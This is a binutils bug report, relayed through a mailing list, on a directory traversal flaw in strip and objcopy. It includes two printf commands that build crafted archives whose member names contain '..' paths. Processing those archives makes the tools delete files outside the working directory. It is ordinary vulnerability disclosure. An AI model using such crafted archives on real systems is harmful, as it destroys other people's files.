https://sourceware.org/bugzilla/show_bug.cgi?id=17552
Bug ID: 17552
Summary: strip/objcopy: directory traversal
Product: binutils
Version: 2.26 (HEAD)
Status: NEW
Severity: normal
Priority: P2
Component: binutils
Assignee: unassigned at sourceware dot org
Reporter: cherepan at mccme dot ru
strip and objcopy don't filter out .. components from paths inside archive.
Consider an archive created with the following command:
$ printf '!<arch>\n%-48s%-10d`\n../file\n%-48s%-10s`\n' '//' 8 '/0' 0 > test.a
then runnig strip/objcopy on it will unlink ./file (e.g.
unlink("stq0g2tL/../st4Mtgu4/../file") ).
Consider this:
$ printf '!<arch>\n%-48s%-10d`\n../../file\n\n%-48s%-10s`\n' '//' 12 '/0' 0 >
test.a
then runnig strip/objcopy on it will unlink ../../file (e.g.
unlink("staOxyFW/../../st4KIqLm/../../file") ).
See also https://sourceware.org/bugzilla/show_bug.cgi?id=17533#c4 .
--
You are receiving this mail because:
You are on the CC list for the bug.
_______________________________________________
bug-binutils mailing list
[email protected]
https://lists.gnu.org/mailman/listinfo/bug-binutils
